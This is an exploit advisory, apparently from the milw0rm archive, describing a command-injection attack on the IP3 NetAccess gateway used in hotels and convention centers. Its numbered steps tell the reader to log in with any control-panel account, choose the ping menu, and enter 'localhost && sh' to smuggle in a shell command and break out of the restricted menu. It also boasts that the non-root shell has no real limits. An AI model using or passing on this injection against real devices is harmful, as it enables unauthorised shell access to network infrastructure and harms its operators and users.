31 lines
No EOL
1.2 KiB
Text
31 lines
No EOL
1.2 KiB
Text
###############################################################
|
|
#NetAccess IP3 - Force into shell
|
|
#By: r00t
|
|
#Shouts: G., Tee, ES, s1ngl3, and D1g1t5
|
|
#
|
|
###############################################################
|
|
#Requirements: Remote access to an IP3
|
|
# Any level control panel username/password
|
|
#
|
|
###############################################################
|
|
#Vendor Information:
|
|
#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com)
|
|
#for including vendor information in his AFD vuln
|
|
#
|
|
#"IP3's NetAccess is a device created for high demand environments such as
|
|
#convention centers or hotels. It handles the Internet access and
|
|
#provides for instance firewalling, billing, rate-limiting as well as
|
|
#various authentication mechanisms. The device is administrated via SSH
|
|
#or a web-based GUI."
|
|
#
|
|
###############################################################
|
|
|
|
1. SSH into the IP3's IP address
|
|
2. After logging in, select the "ping" option (usually menu item 5)
|
|
3. Ping the address: localhost && sh
|
|
4. After four pings to localhost, shell will be forced open
|
|
|
|
One may think there are limitations once logged into shell without
|
|
root access on an IP3. Wrong.
|
|
|
|
# milw0rm.com [2009-09-15] |